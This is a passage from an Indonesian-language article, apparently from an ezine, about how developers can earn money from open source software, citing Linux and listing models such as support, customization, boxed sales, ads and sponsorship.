* menjadi lebih baik
* Tidak ada biaya iklan dan perawatan program
* Sebagai sarana untuk memperkenalkan konsep anda

Linux adalah sebuah contoh yang bagus. Banyak sistem operasi yang berusaha
meniru kisah sukses Linux, tetapi Linux tetap yang paling sukses hingga
saat ini. Aspek positif dari Open Source adalah penerimaan yang luas untuk
software yang benar-benar bagus. Tetapi keuntungan tersebut tidak cukup,
terutama untuk orang yang memang bekerja dengan membuat program
(programmer), mereka membutuhkan uang untuk melanjutkan pengembangan
software mereka (dan untuk makan tentunya).

ungkin beberapa dari pembaca berpikir, ini gila, jika kita membagi-bagikan
software kita dengan gratis, bagaimana kita dapat bertahan? Bagaimana kita
dapat menghasilkan uang?Tapi tunggu,ada beberapa cara yang dapat digunakan
untuk menghasilkan uang dari ekonomi Open Source ini. Tapi penting untuk
diketahui bahwa hanya software yang memang bagus yang dapat bertahan dan
menghasilkan uang, program yang jelek tidak dapat bertahan (kecuali anda
memaksa orang-orang untuk membelinya!).Berikut adalah beberapa diantaranya:

* Jual program dan source code dan manual book dalam sebuah box, program
* tersebut gratis jika pengguna mau mendownloadnya sendiri, tetapi
* pengguna harus membayar untuk mendapatkan produk komersialnya.
* Jual program tambahan yang memanfaatkan teknik tingkat tinggi program
* Open Source anda.
* Jual dukungan teknis untuk membantu pengguna menggunakan produk
* tersebut.
* Jual jasa untuk customize program sesuai dengan kebutuhan pengguna.
* Sisipan iklan pada software.
* Mencari sponsorship dari perusahaan yang berhubungan dengan software
* yang dibuat.

sumber : konsultanlinux.com
ezine.echo.or.id